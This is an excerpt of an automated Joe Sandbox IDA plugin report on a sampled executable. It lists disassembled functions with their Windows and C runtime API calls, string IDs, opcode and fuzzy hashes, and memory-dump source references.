                                                                                                      • Instruction ID: 16af5c2bf6b7afd1a439818c4b8666dc3268f6382fc650ba0d654304ff444acb
                                                                                                      • Opcode Fuzzy Hash: cc590421fc78157cff5c137e639093d4f8e78c1342f888daa37d84409f4d1e4e
                                                                                                      • Instruction Fuzzy Hash: 17519EB1D053498FDB24CF5AD8857BABBF5FF48320F14846AD401EB250D7B49A40EBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00001C2D,00FE146F), ref: 00FE1C26
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      • Opcode ID: 81c56c55e4bf917a69fdc4f9226664154c54fb91ce06e73dad107e3c3542e26f
                                                                                                      • Instruction ID: 29e295085f9b6b8948e6cbdd7a9d036e2bfde4e1f8284f4203e3cda42349fa3b
                                                                                                      • Opcode Fuzzy Hash: 81c56c55e4bf917a69fdc4f9226664154c54fb91ce06e73dad107e3c3542e26f
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 22ff773223f0760f829f9aca05579ea2514ba610a912c3c9b82d7028a45c2fa9
                                                                                                      • Instruction ID: 50884db7ff1d5adb970946f55f1de444fe63b9b65107cd7f1ace077e2e69a31f
                                                                                                      • Opcode Fuzzy Hash: 22ff773223f0760f829f9aca05579ea2514ba610a912c3c9b82d7028a45c2fa9
                                                                                                      • Instruction Fuzzy Hash: 7AA02470501105CF43404F315D04F1C3FDC5D045D0304401C5004C0030DF304041FF00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID: PATH$\
                                                                                                      • API String ID: 485612231-1896636505
                                                                                                      • Opcode ID: 2d95af481ee2db63e24ecbdd9b2e0a15050e7ef30bef812e3a0bcea14b271b65
                                                                                                      • Instruction ID: cd84bf1c0fa49d1202b3228ec1e781c1c0d63fe442db5705d9defc152152932d
                                                                                                      • Opcode Fuzzy Hash: 2d95af481ee2db63e24ecbdd9b2e0a15050e7ef30bef812e3a0bcea14b271b65
                                                                                                      • Instruction Fuzzy Hash: 6F913871D0439A9FEF259F66CC417BE7BA4AF213B8F24052AE410E61C1EF789944EB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00FE365A
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00FE3768
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00FE38BA
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00FE38D5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 2751267872-393685449
                                                                                                      • Opcode ID: e3feedd2726aa024336f4a2ae64f07fefd07e39dff619aad0e06d9d881056203
                                                                                                      • Instruction ID: cb94aaa2f6c403a4cf53ec1f0ece50faf42f540c0ef0093c1a23595bcae31609
                                                                                                      • Opcode Fuzzy Hash: e3feedd2726aa024336f4a2ae64f07fefd07e39dff619aad0e06d9d881056203
                                                                                                      • Instruction Fuzzy Hash: 25B17C72C00289EFCF25DFA6C8899AEB7B5BF14320B15415AF8016B212D735EB51EF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                      • String ID:
                                                                                                      • API String ID: 127012223-0
                                                                                                      • Opcode ID: 892bdfa2b99718900595d1950e9ba5fcbd7c0c3d7502254b15fde1c4eea91e14
                                                                                                      • Instruction ID: 2611c05ad8639683bfb3fe42417c30352c00a64b4b53ce56792af5f859d787e9
                                                                                                      • Opcode Fuzzy Hash: 892bdfa2b99718900595d1950e9ba5fcbd7c0c3d7502254b15fde1c4eea91e14
                                                                                                      • Instruction Fuzzy Hash: 28713B72D002C95BDF20DE66CC52FAE77BAAF85760F250069F945A7281D7398C02A7E4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FE1F97
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00FE1F9F
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FE2028
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00FE2053
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FE20A8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: 1ee196af005755d006aa0b63ae061dd941cacf27ad7ff28cee3a743097d23540
                                                                                                      • Instruction ID: 96646fc7ea52cdcc81ae6bcd793ccbc54a1735a4bdc4dff1e97f50953b3bbcfe
                                                                                                      • Opcode Fuzzy Hash: 1ee196af005755d006aa0b63ae061dd941cacf27ad7ff28cee3a743097d23540
                                                                                                      • Instruction Fuzzy Hash: 5E41D631E002889FCF10DF6ACC81A9EBBB9BF45324F148155E9149B396E775EA01EB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00FE9561,00FE9E42,?,00000000,00000000,00000000,?,00FE9737,00000022,FlsSetValue,00FF2098,00FF20A0,00000000), ref: 00FE9513
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3664257935-537541572
                                                                                                      • Opcode ID: ff2967a4d3be1fb15357b7ccd095b377fbb21d415deff86d11bb81bacca8471a
                                                                                                      • Instruction ID: c5722ce948ad59d02b3c97de73dfb10cabf41594e90d19948d4a55e4688472de
                                                                                                      • Opcode Fuzzy Hash: ff2967a4d3be1fb15357b7ccd095b377fbb21d415deff86d11bb81bacca8471a
                                                                                                      • Instruction Fuzzy Hash: 7B21D872E04759ABCB21D7269C40B6B375DAF417B0F144120E916A72D2EB70ED01E6F1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00FE2608,00FE22DC,00FE1C71), ref: 00FE261F
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FE262D
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FE2646
                                                                                                      • SetLastError.KERNEL32(00000000,00FE2608,00FE22DC,00FE1C71), ref: 00FE2698
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 0dd5a5ff1f8125b1f926abd7af907a42c3206075f0935f92bf0d74e40564b5dc
                                                                                                      • Instruction ID: 1a8689b67713bee12339a483f260d769f5faee165c0d542645baefc73a948a82
                                                                                                      • Opcode Fuzzy Hash: 0dd5a5ff1f8125b1f926abd7af907a42c3206075f0935f92bf0d74e40564b5dc
                                                                                                      • Instruction Fuzzy Hash: BF01D433A0D3955EEBA52676BC85A3A3B9DEF05774B20032AF110850F1FF914C11F148
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8C3A99CC,?,?,00000000,00FEF51A,000000FF,?,00FE4F46,00FE502A,?,00FE4F1A,00000000), ref: 00FE4F9F
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FE4FB1
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,00FEF51A,000000FF,?,00FE4F46,00FE502A,?,00FE4F1A,00000000), ref: 00FE4FD3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: f6f7e1d73a156f9ceba62a47bbb6f9fdba75233f43a3622012a74162bbd8d571
                                                                                                      • Instruction ID: 43a836040de3c5a275058a2e621ff5624813c7d08ca391767a2951d8a09c808b
                                                                                                      • Opcode Fuzzy Hash: f6f7e1d73a156f9ceba62a47bbb6f9fdba75233f43a3622012a74162bbd8d571
                                                                                                      • Instruction Fuzzy Hash: 7C01A731904659BFCB018F40DC05FBEB7BCFF04B21F004129E811A2690DF74A900DA90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FEB455
                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FEB51E
                                                                                                      • __freea.LIBCMT ref: 00FEB585
                                                                                                        • Part of subcall function 00FE8E93: RtlAllocateHeap.NTDLL(00000000,00FE7B98,00FE9E42,?,00FE7B98,00000220,?,?,00FE9E42), ref: 00FE8EC5
                                                                                                      • __freea.LIBCMT ref: 00FEB598
                                                                                                      • __freea.LIBCMT ref: 00FEB5A5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1423051803-0
                                                                                                      • Opcode ID: 38be501e6b9810566b9deb2a72c1ed2abb59f51f586045ca1056ce363acf4557
                                                                                                      • Instruction ID: ebc84eaf8da486da86171b7c3f3915e3349ffbc80b004c52e2da0d3052b6d45b
                                                                                                      • Opcode Fuzzy Hash: 38be501e6b9810566b9deb2a72c1ed2abb59f51f586045ca1056ce363acf4557
                                                                                                      • Instruction Fuzzy Hash: 6C51D572A10386AFDB209F67CC42EBF3BA9EF84360F190429FD04E6155EB75CC10A660
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00FE27E4,00000000,?,00FF7C68,?,?,?,00FE2987,00000004,InitializeCriticalSectionEx,00FF0C98,InitializeCriticalSectionEx), ref: 00FE2840
                                                                                                      • GetLastError.KERNEL32(?,00FE27E4,00000000,?,00FF7C68,?,?,?,00FE2987,00000004,InitializeCriticalSectionEx,00FF0C98,InitializeCriticalSectionEx,00000000,?,00FE2707), ref: 00FE284A
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00FE2872
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                      • Opcode ID: 81ca2613720278049d0664173299e27c0b6e6e264b76271e2a3009c8311ede9a
                                                                                                      • Instruction ID: 35fa6dd082fc9feac062f10479357dc6b6390df06715d52b2a957d652a2172b5
                                                                                                      • Opcode Fuzzy Hash: 81ca2613720278049d0664173299e27c0b6e6e264b76271e2a3009c8311ede9a
                                                                                                      • Instruction Fuzzy Hash: A7E09A70680248B7EF601B62EC06B693A5DBF10B65F144031FA0EE80E2EF65D951E659
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetConsoleOutputCP.KERNEL32(8C3A99CC,00000000,00000000,?), ref: 00FEB995
                                                                                                        • Part of subcall function 00FE8185: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00FEB57B,?,00000000,-00000008), ref: 00FE81E6
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FEBBE7
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FEBC2D
                                                                                                      • GetLastError.KERNEL32 ref: 00FEBCD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2112829910-0
                                                                                                      • Opcode ID: ae99766082b3525b5e47e105236a3c79fa270c90180aa23822f1a8656b93a1b9
                                                                                                      • Instruction ID: ab465410ed8596a4ef25f53c349a9010aff56c63b38957ed0e50b2ecb14edfed
                                                                                                      • Opcode Fuzzy Hash: ae99766082b3525b5e47e105236a3c79fa270c90180aa23822f1a8656b93a1b9
                                                                                                      • Instruction Fuzzy Hash: BCD18E75E042889FCF15CFA9D880AEEBBB5FF49310F24416AE416EB351DB30A946DB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: b8d2cad8a022a3ca59f4876cda528cef6323f55145dc25e66a6d265e05463fe0
                                                                                                      • Instruction ID: e259bcb97ab1651a76eefa616369fe3c8827a2fcfb0a5a75409b9b6ce1cec42f
                                                                                                      • Opcode Fuzzy Hash: b8d2cad8a022a3ca59f4876cda528cef6323f55145dc25e66a6d265e05463fe0
                                                                                                      • Instruction Fuzzy Hash: 6951CE72A04686AFDB26CF16C84DFAA77A4EF00720F244029E905472D1EB35EE41EB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00FE8230
                                                                                                        • Part of subcall function 00FE8185: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00FEB57B,?,00000000,-00000008), ref: 00FE81E6
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FE8268
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FE8288
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 158306478-0
                                                                                                      • Opcode ID: 78b6fc718aa289ec271531fc0f426a9d033c5423af8e5cafdbb3bb47333dbeea
                                                                                                      • Instruction ID: 862c79dc3e436288739552a65fb59859281404901028df396bc8619243d1e3b3
                                                                                                      • Opcode Fuzzy Hash: 78b6fc718aa289ec271531fc0f426a9d033c5423af8e5cafdbb3bb47333dbeea
                                                                                                      • Instruction Fuzzy Hash: EA116DB29059997EAB2537B79C8EDBF7A5CDF857E87100424FA09D1101EE688E02B1B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00FECCE2,00000000,00000001,00000000,?,?,00FEBD24,?,00000000,00000000), ref: 00FED53D
                                                                                                      • GetLastError.KERNEL32(?,00FECCE2,00000000,00000001,00000000,?,?,00FEBD24,?,00000000,00000000,?,?,?,00FEC2C7,00000000), ref: 00FED549
                                                                                                        • Part of subcall function 00FED50F: CloseHandle.KERNEL32(FFFFFFFE,00FED559,?,00FECCE2,00000000,00000001,00000000,?,?,00FEBD24,?,00000000,00000000,?,?), ref: 00FED51F
                                                                                                      • ___initconout.LIBCMT ref: 00FED559
                                                                                                        • Part of subcall function 00FED4D1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FED500,00FECCCF,?,?,00FEBD24,?,00000000,00000000,?), ref: 00FED4E4
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00FECCE2,00000000,00000001,00000000,?,?,00FEBD24,?,00000000,00000000,?), ref: 00FED56E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: eb117dfd2a3aa3c3fec03460f0a7084155269a89c1f5c5d9efd7fb86ceb55739
                                                                                                      • Instruction ID: 438232779d0686d645d972826d86e31e07664484cc3fb93d7c4de3e4c958bc22
                                                                                                      • Opcode Fuzzy Hash: eb117dfd2a3aa3c3fec03460f0a7084155269a89c1f5c5d9efd7fb86ceb55739
                                                                                                      • Instruction Fuzzy Hash: 04F01C7640125CBBCF622F92DC08EAA3F6AFF083B0B144010FA1895561CA328820FB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 00FE3905
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
